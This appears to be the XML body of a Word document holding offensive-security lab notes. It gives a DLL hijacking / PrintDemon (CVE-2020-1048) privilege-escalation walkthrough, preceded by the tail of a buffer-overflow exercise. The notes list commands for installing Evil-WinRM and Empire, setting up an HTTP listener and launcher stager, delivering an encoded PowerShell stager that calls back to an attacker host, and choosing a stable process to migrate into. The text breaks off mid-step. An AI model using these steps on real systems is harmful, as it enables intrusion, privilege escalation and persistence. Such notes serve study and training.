    <w:p w14:paraId="51B30E9D" w14:textId="2BBC8CE3" w:rsidR="00DE3993" w:rsidRDefault="00DE3993" w:rsidP="00DE3993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Compile and run to get real RSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75BC19" w14:textId="52D01BDD" w:rsidR="00DE3993" w:rsidRDefault="00DE3993" w:rsidP="00DE3993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>update payload_gen.py script with real return address value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9E147" w14:textId="6490575F" w:rsidR="00DE3993" w:rsidRDefault="00DE3993" w:rsidP="00DE3993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>generate new payload for use, execute program in terminal, not debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ADA497" w14:textId="0B922256" w:rsidR="00DE3993" w:rsidRDefault="00DE3993" w:rsidP="00DE3993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NC should now connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178CF9B" w14:textId="6EFD927D" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="000949BD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54034F55" w14:textId="085A9B32" w:rsidR="000949BD" w:rsidRDefault="00984116" w:rsidP="000949BD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DLL Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17008729" w14:textId="2E6BAD41" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r w:rsidR="005B74C2">
        <w:t xml:space="preserve"> – See End Disclaimer for Clarification on Empire Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11834ADE" w14:textId="55B3325D" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use of Invoke-PrintDemon to take advantage of Faxhell and PrintDemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A007A1" w14:textId="5E257EC8" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first is a hijack of ualapiDLL when fax service is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D9E43" w14:textId="6EEB3250" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DLL hijacking vulnerabilities occur when a program attempts to load a DLL from a location and cannot find it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF62311" w14:textId="4154AC8E" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">services that run will execute DLLs with their level of privilege – fax runs as SYSTEM </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C8CF0" w14:textId="57A8D91E" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Because C:\Windows\System32 is a privileged folder, attackers must rely on exploit to arbitrarily write to anywhere on the disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E2905" w14:textId="73D4BAD0" w:rsidR="00984116" w:rsidRDefault="00984116" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2020-1048</w:t>
      </w:r>
      <w:r w:rsidR="009A0931">
        <w:t xml:space="preserve"> works based on three concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FA09E" w14:textId="068950B1" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>printer port does not have to be an actual port, but a file location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE95B29" w14:textId="5F265661" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print pooler service creates a shadow job file so the printer can recover the job in case of unexpected interruption of service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCBD79" w14:textId="4765509D" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when a print job is started, it inherits the privilege of the user requesting the job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D262B7" w14:textId="7A2E9178" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shadow job file has no user context attached to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F9B75" w14:textId="200CE98D" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when print spooler service is restarted and initiates a job from the shadow file, inherits Print Spooler services permissions – SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B580DD" w14:textId="479D5567" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In essence, Print Spooler is told to write to any arbitrary file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E22A54" w14:textId="0697DA64" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>as long as Spooler service can be restarted necessary permissions will be given to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1DA51" w14:textId="11126E49" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print jobs survive restarts and restarting computer is allowed by any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1DA2D7" w14:textId="7F5FB17E" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Install Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529307A" w14:textId="46E5940D" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Empire 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D9DF9" w14:textId="6D313A51" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evil-WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14973568" w14:textId="00F2F896" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04374752" w14:textId="5901827C" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009A0931">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidRPr="00071579">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Hackplayers/evil-winrm.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="716ECEFC" w14:textId="5FD95870" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009A0931">
        <w:t>cd evil-winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022ABB0" w14:textId="03016F6B" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009A0931">
        <w:t>gem install evil-winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C018F" w14:textId="5FE1909C" w:rsidR="009A0931" w:rsidRDefault="009A0931" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Remote Management (WinRM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B758D6E" w14:textId="6CA1E119" w:rsidR="009A0931" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to login to a user-level account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194565A9" w14:textId="5E4EF640" w:rsidR="004B70AB" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>use Evil-WinRM to deploy Empire agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649ED83" w14:textId="579E3F38" w:rsidR="004B70AB" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>drop in a multi/handler to Evil-WinRM session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEC1BA3" w14:textId="6B7261C2" w:rsidR="004B70AB" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>evil-winrm -I &lt;ip&gt; -u &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D324F" w14:textId="69CFA846" w:rsidR="004B70AB" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E777CA4" w14:textId="5A8CFB30" w:rsidR="004B70AB" w:rsidRDefault="004B70AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Launch Empire Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D4F07" w14:textId="2E4E7E23" w:rsidR="004B70AB" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Launch Starkiller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1449C7EE" w14:textId="04980495" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F47682" w14:textId="058AF636" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>http, set Host and Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F141E74" w14:textId="43F94EBB" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create Stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E44AF" w14:textId="4237024C" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>multi/launcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536007EF" w14:textId="1ACB57DA" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>preset listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5F567" w14:textId="0DCEE166" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Empire CL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9B08A" w14:textId="66AB6A50" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589A225" w14:textId="7D615D16" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uselistener http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D089C" w14:textId="5820FC8A" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set Host &lt;host ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3011EB41" w14:textId="390680AE" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set Port &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49835765" w14:textId="095AE608" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3776A0" w14:textId="0C9C0AF3" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CD16F" w14:textId="497EE49A" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414B6B2" w14:textId="717473AE" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>usestager multi/launcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86C1FD" w14:textId="34E4F588" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set Listener http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC2278" w14:textId="11440598" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799763E5" w14:textId="6D0A9B59" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy an Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF6A90F" w14:textId="173365C9" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>deliver payload using Evil-WinRM via Powershell prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D49CF9" w14:textId="61FB1C06" w:rsidR="00EB6294" w:rsidRDefault="00EB6294" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>powershell -noP -sta -w 1 -enc &lt;stager output&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796EFEE6" w14:textId="3F2565AE" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>the above code may already be in the starkiller created payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA8C38" w14:textId="26328EA6" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check Agents tab in Starkiller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C972B6D" w14:textId="7E3146AF" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or Empire &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43719831" w14:textId="1EE01E0C" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Spawn as a New Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED6D7B" w14:textId="548FE677" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first – Get-Process command or ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F893F79" w14:textId="29784C36" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for common process that is stable and wont be closed by a user (such as explorer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07107914" w14:textId="52408BEC" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Second – after selecting a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144C710" w14:textId="6B05752A" w:rsidR="00520F9B" w:rsidRDefault="00520F9B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
